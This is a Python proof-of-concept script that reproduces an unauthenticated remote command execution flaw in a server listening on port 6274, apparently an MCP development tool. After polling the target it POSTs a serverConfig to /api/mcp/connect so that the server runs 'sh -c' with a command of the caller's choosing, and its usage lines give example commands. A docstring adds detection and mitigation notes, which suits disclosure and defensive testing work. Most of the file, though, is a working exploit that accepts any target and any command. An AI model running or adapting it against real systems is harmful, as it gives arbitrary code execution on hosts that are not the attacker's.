import subprocess
import time
import requests
import os
import signal
import sys
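def reproduce(target_ip, command):
    """Reproduce the unauthenticated process-spawn request on port 6274.

    Polls ``http://<target_ip>:6274`` for up to 30 seconds until it answers
    with HTTP 200, then POSTs a ``serverConfig`` to ``/api/mcp/connect``
    whose ``command``/``args`` amount to ``sh -c <command>``. The request
    carries no credentials, token or custom headers, so a server that acts
    on it is launching a caller-chosen process for any client that can
    reach the port.

    Defender notes:
      * Detection: a POST to ``/api/mcp/connect`` from a non-local address,
        a ``serverConfig.command`` naming a shell or interpreter, or a
        shell spawned as a child of the server process. The fixed
        ``serverId`` value used here is only a weak indicator, since the
        caller chooses it.
      * Mitigation: keep the listener on loopback, require authentication
        on the connect endpoint, and restrict ``command`` to an allowlist
        rather than accepting it from the request body.

    Args:
        target_ip: Host (name or address) of the server under test.
        command: String passed verbatim as the argument of ``sh -c``.

    Returns:
        None. Progress and the server's response are printed to stdout.
    """
    base_url = f"http://{target_ip}:6274"

    print("[*] Waiting for server to start on port 6274...")
    deadline = time.monotonic() + 30
    server_ready = False
    while time.monotonic() < deadline:
        try:
            response = requests.get(base_url, timeout=1)
        except (requests.exceptions.ConnectionError,
                requests.exceptions.Timeout):
            # Not listening yet, or it accepted the connection but did not
            # answer within the 1 s budget; either way, poll again.
            pass
        else:
            if response.status_code == 200:
                server_ready = True
                break
        # Sleep after every unsuccessful poll, including a non-200 answer,
        # so the loop never hammers the server back-to-back.
        time.sleep(1)

    if not server_ready:
        print("[!] Server failed to start in time.")
        return
    print("[+] Server is up and running.")

    print("[*] Sending exploit payload...")
    exploit_url = f"{base_url}/api/mcp/connect"
    payload = {
        "serverConfig": {
            "command": "sh",
            "args": ["-c", command],
            "env": {
                # Forwards this machine's DISPLAY value (default ":0") into
                # the environment requested for the spawned process.
                "DISPLAY": os.environ.get("DISPLAY", ":0")
            }
        },
        "serverId": "rce_test"
    }
    try:
        response = requests.post(exploit_url, json=payload, timeout=5)
        print(f"[*] Server responded: {response.status_code}")
        print(f"[*] Response body: {response.text}")
    except Exception as e:
        # Deliberately best-effort: a dropped connection does not prove the
        # request was ignored, so the failure is reported and not raised.
        print(f"[*] Request failed (this might be expected if the command execution interrupts the connection): {e}")
    print("[+] Payload sent.")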
if __name__ == "__main__":
    # Exactly two positional arguments are required: the host running the
    # server on port 6274 and the command string handed to reproduce().
    if len(sys.argv) == 3:
        target_ip, command = sys.argv[1], sys.argv[2]
        reproduce(target_ip, command)
    else:
        script_name = sys.argv[0]
        print(f"Usage: {script_name} <target_ip> 'id > /tmp/mcpjam_pwned.txt'")
        print(f"Usage: {script_name} <target_ip> 'xcalc'")
        sys.exit(1)